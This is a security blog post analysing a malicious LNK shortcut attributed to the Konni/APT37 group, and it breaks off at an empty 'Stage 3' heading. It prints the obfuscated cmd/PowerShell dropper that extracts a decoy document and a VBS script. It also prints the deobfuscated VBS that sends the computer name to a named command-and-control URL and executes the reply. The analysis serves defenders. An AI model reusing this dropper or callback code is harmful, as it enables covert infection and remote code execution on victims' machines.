<!DOCTYPE html>

<html lang="en">
  
  <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=0.5, maximum-scale=5"> <!-- Theme Mode--> <script> const darkBtn = "Dark"; const lightBtn = "Light"; const isAutoTheme = true; const preferredTheme = window.matchMedia('(prefers-color-scheme: dark)').matches ? 'dark' : 'light'; if (isAutoTheme) { document.documentElement.setAttribute('data-theme', sessionStorage.getItem('theme') ?? preferredTheme); } else { document.documentElement.setAttribute('data-theme', "auto"); } </script> <!-- Main JS (navbar.js, katex_init.js and masonry_init.js)--> <script defer src="/assets/js/main.min.js"></script> <!-- CSS --> <link rel="stylesheet" href="/assets/css/main.css"> <!--Favicon--> <link rel="shortcut icon" href="/assets/favicon.ico" type="image/x-icon"> <!-- KaTeX 0.16.9 --> <script defer src="/assets/js/vendor/katex.min.js"></script> <script defer src="/assets/js/vendor/katex.auto-render.min.js" onload="renderMathInElement(document.body);"></script> <!-- Mermaid 10.6.1 --> <script defer src="/assets/js/vendor/mermaid.min.js" onload="mermaid.initialize({ startOnLoad:true, theme: 'default', });"></script> <!-- Simple Jekyll Search 1.10.0 --> <script src="/assets/js/vendor/simple-jekyll-search.min.js" type="text/javascript"></script> <!-- Google Analytics / Cookie Consent --> <script> const cookieName = 'cookie-notice-dismissed-http://localhost:4000'; const isCookieConsent = 'false'; const analyticsName = ''; const analyticsNameGA4 = ''; </script> <!-- seo tags --> <meta property="og:image" content="http://localhost:4000//assets/img/feature-img/konni.jpg"> <meta property="og:type" content="website" /> <!-- Begin Jekyll SEO tag v2.8.0 --> <title>Konni [ North Korea-linked APT group ] LNK Analysis | Security Blogs</title> <meta name="generator" content="Jekyll v4.3.3" /> <meta property="og:title" content="Konni [ North Korea-linked APT group ] LNK Analysis" /> <meta property="og:locale" content="en_US" /> <meta name="description" content="This blog will cover the technical analysis of Konni malware family malicious Lnk file. But before starting the analysis I know you are asking a question what/who is konni ?" /> <meta property="og:description" content="This blog will cover the technical analysis of Konni malware family malicious Lnk file. But before starting the analysis I know you are asking a question what/who is konni ?" /> <link rel="canonical" href="http://localhost:4000/2024/01/26/Konni-APT-LNK-Analysis.html" /> <meta property="og:url" content="http://localhost:4000/2024/01/26/Konni-APT-LNK-Analysis.html" /> <meta property="og:site_name" content="Security Blogs" /> <meta property="og:type" content="article" /> <meta property="article:published_time" content="2024-01-26T00:00:00+05:30" /> <meta name="twitter:card" content="summary" /> <meta property="twitter:title" content="Konni [ North Korea-linked APT group ] LNK Analysis" /> <script type="application/ld+json"> {"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2024-01-26T00:00:00+05:30","datePublished":"2024-01-26T00:00:00+05:30","description":"This blog will cover the technical analysis of Konni malware family malicious Lnk file. But before starting the analysis I know you are asking a question what/who is konni ?","headline":"Konni [ North Korea-linked APT group ] LNK Analysis","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/2024/01/26/Konni-APT-LNK-Analysis.html"},"url":"http://localhost:4000/2024/01/26/Konni-APT-LNK-Analysis.html"}</script> <!-- End Jekyll SEO tag --> <!-- RSS --> <link rel="alternate" type="application/atom+xml" title="Security Blogs" href="http://localhost:4000/feed.xml"/> <link type="application/atom+xml" rel="alternate" href="http://localhost:4000/feed.xml" title="Security Blogs" /> <!-- Twitter Cards --> <meta name="twitter:title" content="Konni [ North Korea-linked APT group ] LNK Analysis"> <meta name="twitter:description" content="This blog will cover the technical analysis of Konni malware family malicious Lnk file. But before starting the analysis I know you are asking a question wha..."> <meta name="twitter:card" content="summary_large_image"> <meta name="twitter:image" content="http://localhost:4000//assets/img/feature-img/konni.jpg"> <meta name="twitter:image:alt" content="Konni [ North Korea-linked APT group ] LNK Analysis"> </head>
  <body>
    
    <header class="site-header"> <!-- Logo and title --> <div class="branding"> <a href="/"> <img alt="logo img" class="avatar" src="/assets/img/triangle.png" loading="lazy"/> </a> <a class="site-title" aria-label="Security Blogs" href="/"> Security Blogs </a> </div> <!-- Toggle menu --> <nav class="clear"> <a aria-label="pull" id="pull" class="toggle" href="#"> <i class="fas fa-bars fa-lg"></i> </a> <!-- Menu --> <ul class="hide"> <li class="separator"> | </li> <li> <a class="clear" aria-label="Search" title="Search" href="/search/"> <i class="navbar-icon fas fa-search" aria-hidden="true"></i> <span class="navbar-label navbar-label-with-icon">Search</span> </a> </li> <li class="separator"> | </li> <li><a id="theme-toggle" title="Konni [ North Korea-linked APT group ] LNK Analysis " aria-label="Konni [ North Korea-linked APT group ] LNK Analysis" onclick="themeToggle()"></a></li> </ul> </nav> </header>
    <div class="content">
      <article class="feature-image" >
    <header id="main" style="">
        <div class="title-padder">
            
                <h1 id="Konni+%5B+North+Korea-linked+APT+group+%5D+LNK+Analysis" class="title">Konni [ North Korea-linked APT group ] LNK Analysis</h1>
                


<div class="post-info">
    <p class="meta">
      
      
      January 26, 2024
    </p></div>

            
        </div>
    </header>

    <section class="post-content">
    
            <p>This blog will cover the technical analysis of Konni malware family malicious Lnk file. But before starting the analysis I know you are asking a question what/who is konni ?</p>

<blockquote>
  <p>[!NOTE] : I’m not an expert, but I’m keen on improvement. If you spot any mistakes in my blog, please DM me on any platform you like for constructive feedback.</p>
</blockquote>

<h1 id="whatwho-is-konni-">What/who is Konni ?</h1>
<p>The Konni malware family is indeed associated with the APT37 (also known as Reaper or Group123) cyber espionage group. APT37 is believed to be a state-sponsored hacking group based in North Korea. APT37 has been known to target organizations primarily in South Korea, especially those in the political and military sectors. The group has also been linked to campaigns against entities in Japan, Vietnam, Russia, Nepal, China, India, Romania, Kuwait, and other parts of the Middle East. APT37 has employed a variety of tools and techniques in its operations, including custom malware such as the Konni RAT, data exfiltration tools, and spear-phishing campaigns.</p>

<h2 id="infection-chain">Infection chain</h2>

<p><img src="/assets/img/Konni_Mal/Pasted%20image%2020240126214209.png" alt="" /></p>

<h2 id="stage-1">Stage 1</h2>
<p>We have a lnk, this looks like a normal lnk file and it targets to the cmd.exe binary in the syswow64 directory.</p>

<p>Result of ExifTool</p>

<p><img src="/assets/img/Konni_Mal/Pasted%20image%2020240126112721.png" alt="" /></p>

<p>As we can see in the below image the Target is set to the cmd.exe Therefore it will start the cmd.exe from the syswow64.</p>

<p><img src="/assets/img/Konni_Mal/Pasted%20image%2020240126112836.png" alt="" /></p>

<p>The Size of the LNK file is something suspicious, The size of this LNK file is 24935KB [ ~25 MB ]. There are lot of space after the cmd.exe it means there is lot more content added after that.</p>

<p><img src="/assets/img/Konni_Mal/Pasted%20image%2020240126112948.png" alt="" /></p>

<p>The best way to check is put the LNK file in any Hex Editor, I used HXD to check the file hex and ASCII. After scrolling down little bit at offset B60, we found that there are lot more commands like set, call etc.</p>

<p><img src="/assets/img/Konni_Mal/Pasted%20image%2020240126113141.png" alt="" /></p>

<p>This is the complete script found in the LNK file. Let’s discuss what actually this script will execute.</p>

<p><img src="/assets/img/Konni_Mal/Pasted%20image%2020240126113345.png" alt="" /></p>

<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">/</span><span class="nx">q</span> <span class="o">/</span><span class="nx">c</span> <span class="nb">Set</span> <span class="nx">K</span><span class="o">=</span><span class="nx">JkaqBnPUKuftX6iVHIRSTYDLMpAgWsde3Fczm2r8jl1vG0b4hoNZ9yOQ5wExC7</span> <span class="o">&amp;&amp;</span> <span class="nx">call</span> <span class="o">%</span><span class="nx">K</span><span class="p">:</span><span class="o">~</span><span class="mi">25</span><span class="p">,</span><span class="mi">1</span><span class="o">%%</span><span class="nx">K</span><span class="p">:</span><span class="o">~</span><span class="mi">49</span><span class="p">,</span><span class="mi">1</span><span class="o">%%</span><span class="nx">K</span><span class="p">:</span><span class="o">~</span><span class="mi">57</span><span class="p">,</span><span class="mi">1</span><span class="o">%%</span><span class="nx">K</span><span class="p">:</span><span class="o">~</span><span class="mi">31</span><span class="p">,</span><span class="mi">1</span><span class="o">%%</span><span class="nx">K</span><span class="p">:</span><span class="o">~</span><span class="mi">38</span><span class="p">,</span><span class="mi">1</span><span class="o">%%</span><span class="nx">K</span><span class="p">:</span><span class="o">~</span><span class="mi">29</span><span class="p">,</span><span class="mi">1</span><span class="o">%%</span><span class="nx">K</span><span class="p">:</span><span class="o">~</span><span class="mi">48</span><span class="p">,</span><span class="mi">1</span><span class="o">%%</span><span class="nx">K</span><span class="p">:</span><span class="o">~</span><span class="mi">31</span><span class="p">,</span><span class="mi">1</span><span class="o">%%</span><span class="nx">K</span><span class="p">:</span><span class="o">~</span><span class="mi">41</span><span class="p">,</span><span class="mi">1</span><span class="o">%%</span><span class="nx">K</span><span class="p">:</span><span class="o">~</span><span class="mi">41</span><span class="p">,</span><span class="mi">1</span><span class="o">%</span> <span class="o">-%</span><span class="nx">K</span><span class="p">:</span><span class="o">~</span><span class="mi">57</span><span class="p">,</span><span class="mi">1</span><span class="o">%%</span><span class="nx">K</span><span class="p">:</span><span class="o">~</span><span class="mi">14</span><span class="p">,</span><span class="mi">1</span><span class="o">%%</span><span class="nx">K</span><span class="p">:</span><span class="o">~</span><span class="mi">5</span><span class="p">,</span><span class="mi">1</span><span class="o">%%</span><span class="nx">K</span><span class="p">:</span><span class="o">~</span><span class="mi">30</span><span class="p">,</span><span class="mi">1</span><span class="o">%%</span><span class="nx">K</span><span class="p">:</span><span class="o">~</span><span class="mi">49</span><span class="p">,</span><span class="mi">1</span><span class="o">%%</span><span class="nx">K</span><span class="p">:</span><span class="o">~</span><span class="mi">57</span><span class="p">,</span><span class="mi">1</span><span class="o">%%</span><span class="nx">K</span><span class="p">:</span><span class="o">~</span><span class="mi">29</span><span class="p">,</span><span class="mi">1</span><span class="o">%%</span><span class="nx">K</span><span class="p">:</span><span class="o">~</span><span class="mi">11</span><span class="p">,</span><span class="mi">1</span><span class="o">%%</span><span class="nx">K</span><span class="p">:</span><span class="o">~</span><span class="mi">53</span><span class="p">,</span><span class="mi">1</span><span class="o">%%</span><span class="nx">K</span><span class="p">:</span><span class="o">~</span><span class="mi">41</span><span class="p">,</span><span class="mi">1</span><span class="o">%%</span><span class="nx">K</span><span class="p">:</span><span class="o">~</span><span class="mi">31</span><span class="p">,</span><span class="mi">1</span><span class="o">%</span> <span class="o">%</span><span class="nx">K</span><span class="p">:</span><span class="o">~</span><span class="mi">48</span><span class="p">,</span><span class="mi">1</span><span class="o">%%</span><span class="nx">K</span><span class="p">:</span><span class="o">~</span><span class="mi">14</span><span class="p">,</span><span class="mi">1</span><span class="o">%%</span><span class="nx">K</span><span class="p">:</span><span class="o">~</span><span class="mi">30</span><span class="p">,</span><span class="mi">1</span><span class="o">%%</span><span class="nx">K</span><span class="p">:</span><span class="o">~</span><span class="mi">30</span><span class="p">,</span><span class="mi">1</span><span class="o">%%</span><span class="nx">K</span><span class="p">:</span><span class="o">~</span><span class="mi">31</span><span class="p">,</span><span class="mi">1</span><span class="o">%%</span><span class="nx">K</span><span class="p">:</span><span class="o">~</span><span class="mi">5</span><span class="p">,</span><span class="mi">1</span><span class="o">%</span> <span class="dl">"</span><span class="s2">$Bj3hw23s4llgyv = Get-Location;$tywwh842L = Get-ChildItem -Path $Bj3hw23s4llgyv -Recurse *.lnk | where-object {$_.length -eq 0x01859999} | Select-Object -ExpandProperty FullName;if($tywwh842L.length -eq 0) {$Bj3hw23s4llgyv = $env:Temp;$tywwh842L = Get-ChildItem -Path $Bj3hw23s4llgyv -Recurse *.lnk | where-object {$_.length -eq 0x01859999} | Select-Object -ExpandProperty FullName;};$Bj3hw23s4llgyv = Split-Path $tywwh842L;$hl0xA4j = New-Object System.IO.FileStream($tywwh842L, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$hl0xA4j.Seek(0x00001A6E, [System.IO.SeekOrigin]::Begin);$nBmFkheUsdoQ = New-Object byte[] 0x0014DEBF;$hl0xA4j.Read($nBmFkheUsdoQ, 0, 0x0014DEBF);$UVJuXNSbxZC4L = $Bj3hw23s4llgyv + '</span><span class="se">\</span><span class="s2">' + [regex]::unescape('[
).hwp');sc $UVJuXNSbxZC4L $nBmFkheUsdoQ -Encoding Byte;&amp; $UVJuXNSbxZC4L;$hl0xA4j.Seek(0x0014F92D, [System.IO.SeekOrigin]::Begin);$ZS7EsGY5=New-Object byte[] 0x000018A7;$hl0xA4j.Read($ZS7EsGY5, 0, 0x000018A7);$hl0xA4j.Close();Remove-Item -Path $tywwh842L -Force;$x2vuZ_FNChxBs=$env:public + '</span><span class="se">\</span><span class="s2">Libraries</span><span class="se">\</span><span class="s2">vc98ee3f0.vbs';sc $x2vuZ_FNChxBs $ZS7EsGY5 -Encoding Byte;&amp; wscript.exe $x2vuZ_FNChxBs;</span><span class="dl">"</span>
</code></pre></div></div>

<h3 id="understanding-initial-script">Understanding Initial Script</h3>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">Set</span> <span class="n">K</span><span class="o">=</span><span class="n">JkaqBnPUKuftX6iVHIRSTYDLMpAgWsde3Fczm2r8jl1vG0b4hoNZ9yOQ5wExC7</span> <span class="o">&amp;&amp;</span> <span class="n">call</span> <span class="o">%</span><span class="n">K</span><span class="p">:</span><span class="o">~</span><span class="mi">25</span><span class="p">,</span><span class="mi">1</span><span class="o">%%</span><span class="n">K</span><span class="p">:</span><span class="o">~</span><span class="mi">49</span><span class="p">,</span><span class="mi">1</span><span class="o">%%</span><span class="n">K</span><span class="p">:</span><span class="o">~</span><span class="mi">57</span><span class="p">,</span><span class="mi">1</span><span class="o">%%</span><span class="n">K</span><span class="p">:</span><span class="o">~</span><span class="mi">31</span><span class="p">,</span><span class="mi">1</span><span class="o">%%</span><span class="n">K</span><span class="p">:</span><span class="o">~</span><span class="mi">38</span><span class="p">,</span><span class="mi">1</span><span class="o">%%</span><span class="n">K</span><span class="p">:</span><span class="o">~</span><span class="mi">29</span><span class="p">,</span><span class="mi">1</span><span class="o">%%</span><span class="n">K</span><span class="p">:</span><span class="o">~</span><span class="mi">48</span><span class="p">,</span><span class="mi">1</span><span class="o">%%</span><span class="n">K</span><span class="p">:</span><span class="o">~</span><span class="mi">31</span><span class="p">,</span><span class="mi">1</span><span class="o">%%</span><span class="n">K</span><span class="p">:</span><span class="o">~</span><span class="mi">41</span><span class="p">,</span><span class="mi">1</span><span class="o">%%</span><span class="n">K</span><span class="p">:</span><span class="o">~</span><span class="mi">41</span><span class="p">,</span><span class="mi">1</span><span class="o">%</span> <span class="o">-%</span><span class="n">K</span><span class="p">:</span><span class="o">~</span><span class="mi">57</span><span class="p">,</span><span class="mi">1</span><span class="o">%%</span><span class="n">K</span><span class="p">:</span><span class="o">~</span><span class="mi">14</span><span class="p">,</span><span class="mi">1</span><span class="o">%%</span><span class="n">K</span><span class="p">:</span><span class="o">~</span><span class="mi">5</span><span class="p">,</span><span class="mi">1</span><span class="o">%%</span><span class="n">K</span><span class="p">:</span><span class="o">~</span><span class="mi">30</span><span class="p">,</span><span class="mi">1</span><span class="o">%%</span><span class="n">K</span><span class="p">:</span><span class="o">~</span><span class="mi">49</span><span class="p">,</span><span class="mi">1</span><span class="o">%%</span><span class="n">K</span><span class="p">:</span><span class="o">~</span><span class="mi">57</span><span class="p">,</span><span class="mi">1</span><span class="o">%%</span><span class="n">K</span><span class="p">:</span><span class="o">~</span><span class="mi">29</span><span class="p">,</span><span class="mi">1</span><span class="o">%%</span><span class="n">K</span><span class="p">:</span><span class="o">~</span><span class="mi">11</span><span class="p">,</span><span class="mi">1</span><span class="o">%%</span><span class="n">K</span><span class="p">:</span><span class="o">~</span><span class="mi">53</span><span class="p">,</span><span class="mi">1</span><span class="o">%%</span><span class="n">K</span><span class="p">:</span><span class="o">~</span><span class="mi">41</span><span class="p">,</span><span class="mi">1</span><span class="o">%%</span><span class="n">K</span><span class="p">:</span><span class="o">~</span><span class="mi">31</span><span class="p">,</span><span class="mi">1</span><span class="o">%</span> <span class="o">%</span><span class="n">K</span><span class="p">:</span><span class="o">~</span><span class="mi">48</span><span class="p">,</span><span class="mi">1</span><span class="o">%%</span><span class="n">K</span><span class="p">:</span><span class="o">~</span><span class="mi">14</span><span class="p">,</span><span class="mi">1</span><span class="o">%%</span><span class="n">K</span><span class="p">:</span><span class="o">~</span><span class="mi">30</span><span class="p">,</span><span class="mi">1</span><span class="o">%%</span><span class="n">K</span><span class="p">:</span><span class="o">~</span><span class="mi">30</span><span class="p">,</span><span class="mi">1</span><span class="o">%%</span><span class="n">K</span><span class="p">:</span><span class="o">~</span><span class="mi">31</span><span class="p">,</span><span class="mi">1</span><span class="o">%%</span><span class="n">K</span><span class="p">:</span><span class="o">~</span><span class="mi">5</span><span class="p">,</span><span class="mi">1</span><span class="o">%</span>
</code></pre></div></div>

<p>This is something interesting, first a variable is set and then there is a call command with some random commands. Let’s explore what exactly this means by an example.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">Set</span> <span class="n">Var</span><span class="o">=</span><span class="n">abcdefghijklmn</span>
<span class="n">echo</span> <span class="o">%</span><span class="n">Var</span><span class="p">:</span><span class="o">~</span><span class="mi">3</span><span class="p">,</span><span class="mi">1</span><span class="o">%%</span><span class="n">Var</span><span class="p">:</span><span class="o">~</span><span class="mi">13</span><span class="p">,</span><span class="mi">1</span><span class="o">%%</span><span class="n">Var</span><span class="p">:</span><span class="o">~</span><span class="mi">4</span><span class="p">,</span><span class="mi">1</span><span class="o">%</span>
</code></pre></div></div>

<p>The Output of this will be cmd, so it means %Var:~3 start substring from the index 3 [ index starts from 0 ] and 1% means take only one char.</p>

<p>Similarly the output of malware will be <strong>powershell -windowstyle hidden</strong></p>

<p><img src="/assets/img/Konni_Mal/Pasted%20image%2020240126162400.png" alt="" /></p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="err">$</span><span class="n">Bj3hw23s4llgyv</span> <span class="o">=</span> <span class="n">Get</span><span class="o">-</span><span class="n">Location</span><span class="p">;</span>
<span class="err">$</span><span class="n">tywwh842L</span> <span class="o">=</span> <span class="n">Get</span><span class="o">-</span><span class="n">ChildItem</span> <span class="o">-</span><span class="n">Path</span> <span class="err">$</span><span class="n">Bj3hw23s4llgyv</span> <span class="o">-</span><span class="n">Recurse</span> <span class="o">*</span><span class="p">.</span><span class="n">lnk</span> <span class="o">|</span> <span class="n">where</span><span class="o">-</span><span class="nb">object</span> <span class="p">{</span><span class="err">$</span><span class="n">_</span><span class="p">.</span><span class="n">length</span> <span class="o">-</span><span class="n">eq</span> <span class="mh">0x01859999</span><span class="p">}</span> <span class="o">|</span> <span class="n">Select</span><span class="o">-</span><span class="n">Object</span> <span class="o">-</span><span class="n">ExpandProperty</span> <span class="n">FullName</span>
</code></pre></div></div>

<p>The PowerShell then execute script and get the current location from where the command is executed and then checks for the Files with extensions <strong>LNK</strong> and compares the size and if any file matches these two condition then name is stored in the variable.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="err">$</span><span class="n">Bj3hw23s4llgyv</span> <span class="o">=</span> <span class="n">Split</span><span class="o">-</span><span class="n">Path</span> <span class="err">$</span><span class="n">tywwh842L</span><span class="p">;</span>
<span class="err">$</span><span class="n">hl0xA4j</span> <span class="o">=</span> <span class="n">New</span><span class="o">-</span><span class="n">Object</span> <span class="n">System</span><span class="p">.</span><span class="n">IO</span><span class="p">.</span><span class="nc">FileStream</span><span class="p">(</span><span class="err">$</span><span class="n">tywwh842L</span><span class="p">,</span> <span class="p">[</span><span class="n">System</span><span class="p">.</span><span class="n">IO</span><span class="p">.</span><span class="n">FileMode</span><span class="p">]::</span><span class="n">Open</span><span class="p">,</span> <span class="p">[</span><span class="n">System</span><span class="p">.</span><span class="n">IO</span><span class="p">.</span><span class="n">FileAccess</span><span class="p">]::</span><span class="n">Read</span><span class="p">);</span>
<span class="err">$</span><span class="n">hl0xA4j</span><span class="p">.</span><span class="nc">Seek</span><span class="p">(</span><span class="mh">0x00001A6E</span><span class="p">,</span> <span class="p">[</span><span class="n">System</span><span class="p">.</span><span class="n">IO</span><span class="p">.</span><span class="n">SeekOrigin</span><span class="p">]::</span><span class="n">Begin</span><span class="p">);</span>
<span class="err">$</span><span class="n">nBmFkheUsdoQ</span> <span class="o">=</span> <span class="n">New</span><span class="o">-</span><span class="n">Object</span> <span class="n">byte</span><span class="p">[]</span> <span class="mh">0x0014DEBF</span><span class="p">;</span>
<span class="err">$</span><span class="n">hl0xA4j</span><span class="p">.</span><span class="nc">Read</span><span class="p">(</span><span class="err">$</span><span class="n">nBmFkheUsdoQ</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mh">0x0014DEBF</span><span class="p">);</span>
<span class="err">$</span><span class="n">UVJuXNSbxZC4L</span> <span class="o">=</span> <span class="err">$</span><span class="n">Bj3hw23s4llgyv</span> <span class="o">+</span> <span class="sh">'</span><span class="se">\'</span><span class="s"> + [regex]::unescape(</span><span class="sh">'</span><span class="p">[</span>
<span class="p">).</span><span class="n">hwp</span><span class="sh">'</span><span class="s">);
sc $UVJuXNSbxZC4L $nBmFkheUsdoQ -Encoding Byte;
</span></code></pre></div></div>

<p>The file will be opened in read mode and then the seek [ pointer from where to start reading ] is changed to the 0x00001A6E and read for the size 0x0014DEBF. The start is for the Document file and save the file to the current directory [ sc is not the command to configure services, here it is alias for the Set-Content ]. The Filename have character which are in non printable chars range therefore strings did not print the chars in regex unespace [ check below image ]. The doc file is discussed in the section  <a href="#Fake%20Document">Fake Document</a> section</p>

<p><img src="/assets/img/Konni_Mal/Pasted%20image%2020240126164456.png" alt="" /></p>

<p><img src="/assets/img/Konni_Mal/Pasted%20image%2020240126153701.png" alt="" /></p>

<p><img src="/assets/img/Konni_Mal/Pasted%20image%2020240126153748.png" alt="" /></p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="err">$</span><span class="n">hl0xA4j</span><span class="p">.</span><span class="nc">Seek</span><span class="p">(</span><span class="mh">0x0014F92D</span><span class="p">,</span> <span class="p">[</span><span class="n">System</span><span class="p">.</span><span class="n">IO</span><span class="p">.</span><span class="n">SeekOrigin</span><span class="p">]::</span><span class="n">Begin</span><span class="p">);</span>
<span class="err">$</span><span class="n">ZS7EsGY5</span><span class="o">=</span><span class="n">New</span><span class="o">-</span><span class="n">Object</span> <span class="n">byte</span><span class="p">[]</span> <span class="mh">0x000018A7</span><span class="p">;</span>
<span class="err">$</span><span class="n">hl0xA4j</span><span class="p">.</span><span class="nc">Read</span><span class="p">(</span><span class="err">$</span><span class="n">ZS7EsGY5</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mh">0x000018A7</span><span class="p">);</span>
<span class="err">$</span><span class="n">hl0xA4j</span><span class="p">.</span><span class="nc">Close</span><span class="p">();</span>
<span class="n">Remove</span><span class="o">-</span><span class="n">Item</span> <span class="o">-</span><span class="n">Path</span> <span class="err">$</span><span class="n">tywwh842L</span> <span class="o">-</span><span class="n">Force</span><span class="p">;</span>
<span class="err">$</span><span class="n">x2vuZ_FNChxBs</span><span class="o">=</span><span class="err">$</span><span class="n">env</span><span class="p">:</span><span class="n">public</span> <span class="o">+</span> <span class="sh">'</span><span class="s">\Libraries</span><span class="se">\v</span><span class="s">c98ee3f0.vbs</span><span class="sh">'</span><span class="p">;</span>
<span class="n">sc</span> <span class="err">$</span><span class="n">x2vuZ_FNChxBs</span> <span class="err">$</span><span class="n">ZS7EsGY5</span> <span class="o">-</span><span class="n">Encoding</span> <span class="n">Byte</span><span class="p">;</span>
<span class="o">&amp;</span> <span class="n">wscript</span><span class="p">.</span><span class="n">exe</span> <span class="err">$</span><span class="n">x2vuZ_FNChxBs</span><span class="p">;</span>
</code></pre></div></div>
<p>Then the seek pointer again changed to the start of the offset 0x0014F92D, which is the end of the 
document file and then it read  for the size 0x000018A7. This is the VBS code as shown in below image. The malware remove the LNK file and save the  vbs code to the location $env:public\Libraries\vc98ee3f0.vbs. <strong>wscript.exe</strong> is used to execute the script.</p>

<p><img src="/assets/img/Konni_Mal/Pasted%20image%2020240126165658.png" alt="" /></p>

<p>There are multiple ways to get the vbs code, using strings, execute the LNK then suspend the PowerShell process, collect the vbs from memory. But I am smart [ just joking ] I just changed the wscript.exe to notepad.exe using the hxd and then execute and you will find that notepad is opened and have our clean vbs code without any effort.</p>

<p><img src="/assets/img/Konni_Mal/Pasted%20image%2020240126113521.png" alt="" />
<img src="/assets/img/Konni_Mal/Pasted%20image%2020240126113820.png" alt="" /></p>

<h3 id="fake-document">Fake Document</h3>
<p>The document dropped in the stage 1 is just to fool the user that actual file is opening using the lnk file and behind that  vbs will be executed.</p>

<p>The File is not dumped to the disk properly so I carved from the lnk file manually and when unzipping the file, we have the below directory structure.
<img src="/assets/img/Konni_Mal/Pasted%20image%2020240126211503.png" alt="" /></p>

<p>The script folder have two scripts but both are clean, no malicious code found in them.
<img src="/assets/img/Konni_Mal/Pasted%20image%2020240126211755.png" alt="" /></p>

<h5 id="sourcescriptsjs">sourceScripts.js</h5>
<p><img src="/assets/img/Konni_Mal/Pasted%20image%2020240126211614.png" alt="" /></p>

<h5 id="headerscriptsjs">headerScripts.js</h5>
<p><img src="/assets/img/Konni_Mal/Pasted%20image%2020240126211644.png" alt="" /></p>

<p>This is the png file present in the preview directory
<img src="/assets/img/Konni_Mal/Pasted%20image%2020240126211847.png" alt="" /></p>

<p>Output of the olevba and oleid to find if there is any external ole objects or relationships are there and VBA are present or not.
<img src="/assets/img/Konni_Mal/Pasted%20image%2020240126212005.png" alt="" /></p>

<p><img src="/assets/img/Konni_Mal/Pasted%20image%2020240126212025.png" alt="" /></p>
<h2 id="stage-2">Stage 2</h2>

<p>The vbs dropped in Public User Library is obfuscated as you can check in below image.</p>

<p><img src="/assets/img/Konni_Mal/Pasted%20image%2020240126180046.png" alt="" /></p>

<h3 id="deobfuscating-vbs">Deobfuscating VBS</h3>

<p>There is a pattern :</p>
<ul>
  <li>First there will be a variable which is Initialize with random characters</li>
  <li>Second variable whose value is created by xor operation and then concatenation
    <ul>
      <li><code class="language-plaintext highlighter-rouge">:</code> is used so that multiple instruction can be performed in single line</li>
    </ul>
  </li>
  <li>The second variable final value is assigned to the First variable and same follows for all</li>
</ul>

<p><img src="/assets/img/Konni_Mal/Pasted%20image%2020240126114013.png" alt="" /></p>

<p>Other than these instructions, there are few lines in code which stands out as shown in below image.</p>

<ul>
  <li>Object is created and ComputerName is collected and assigned to variable</li>
  <li>Some possible http request are send and response is executed</li>
</ul>

<p><img src="/assets/img/Konni_Mal/Pasted%20image%2020240126114134.png" alt="" /></p>

<p>Now I have two options either to deobfuscate the code manually or I can use my python skill to save the time. So initially I thought why waste time on building a script. But after spending time on find &amp; replace and executing, I thought let’s write a script.</p>

<p>I have written a script on the basis of the pattern identified above. This script will help you to find the final value of all the variables [ I know this is not the ultimate script but atleast it reduces time which we waste on find &amp; replace, xor etc.. ]</p>

<p>Script Link : <a href="https://gist.github.com/SatyenderYadav/de46604ddc5803ca1e8681a1fc9217ab">Konni Deobfuscation.py</a></p>

<p>Output of the script for the obfuscated vbs. From the output we can easily make a assumption that there is a URL and keywords like XMLHTTP, WScript.Network, it means malware was communicating to a URL for further instruction.</p>

<p><img src="/assets/img/Konni_Mal/Pasted%20image%2020240126114400.png" alt="" /></p>

<p>After replacing the value of variable from the output of above script this can be observed that a GET request will be sent to a URL and the response of the GET request will then further executed.</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">MStMJGQFU2WWvL</span> <span class="o">=</span> <span class="n">otc1lnmclX_fD1</span>
<span class="n">Set</span> <span class="n">mjmVH</span> <span class="o">=</span> <span class="nc">CreateObject</span><span class="p">(</span><span class="n">MStMJGQFU2WWvL</span><span class="p">)</span>
<span class="n">V3wedMG4f</span> <span class="o">=</span> <span class="nc">CreateObject</span><span class="p">(</span><span class="n">WROQ_YD</span><span class="p">).</span><span class="n">ComputerName</span>
<span class="n">xwF7q0noUVrR6V</span> <span class="o">=</span> <span class="n">S1DZTGpId3W32</span>
<span class="n">MWeRawXu7im</span> <span class="o">=</span> <span class="n">S1DZTGpId3W31</span>
<span class="n">mjmVH</span><span class="p">.</span><span class="nb">open</span> <span class="n">MWeRawXu7im</span><span class="p">,</span> <span class="n">xwF7q0noUVrR6V</span> <span class="o">&amp;</span> <span class="n">V3wedMG4f</span><span class="p">,</span> <span class="bp">False</span>
<span class="n">mjmVH</span><span class="p">.</span><span class="n">Send</span>
<span class="nc">Execute</span><span class="p">(</span><span class="n">mjmVH</span><span class="p">.</span><span class="n">responseText</span><span class="p">)</span>

<span class="o">//</span> <span class="n">Final</span> <span class="n">Command</span><span class="p">:</span> 
<span class="n">Microsoft</span><span class="p">.</span><span class="n">XMLHTTP_Object</span><span class="p">.</span><span class="nb">open</span> <span class="n">GET</span> <span class="n">https</span><span class="p">:</span><span class="o">//</span><span class="n">shaira1885</span><span class="p">.</span><span class="n">com</span><span class="o">/</span><span class="n">wp</span><span class="o">-</span><span class="n">admin</span><span class="o">/</span><span class="n">includes</span><span class="o">/</span><span class="n">class</span><span class="o">-</span><span class="n">wp</span><span class="o">-</span><span class="n">release</span><span class="o">-</span><span class="n">data</span><span class="p">.</span><span class="n">php</span><span class="err">?</span><span class="n">class</span><span class="o">=</span> <span class="o">&amp;</span> <span class="n">ComputerName</span><span class="p">,</span> <span class="bp">False</span>
<span class="n">Microsoft</span><span class="p">.</span><span class="n">XMLHTTP_Object</span><span class="p">.</span><span class="n">send</span>
<span class="nc">Execute</span><span class="p">(</span><span class="n">Microsoft</span><span class="p">.</span><span class="n">XMLHTTP_Object</span><span class="p">.</span><span class="n">responseText</span><span class="p">)</span>
</code></pre></div></div>

<h2 id="stage-3">Stage 3</h2>

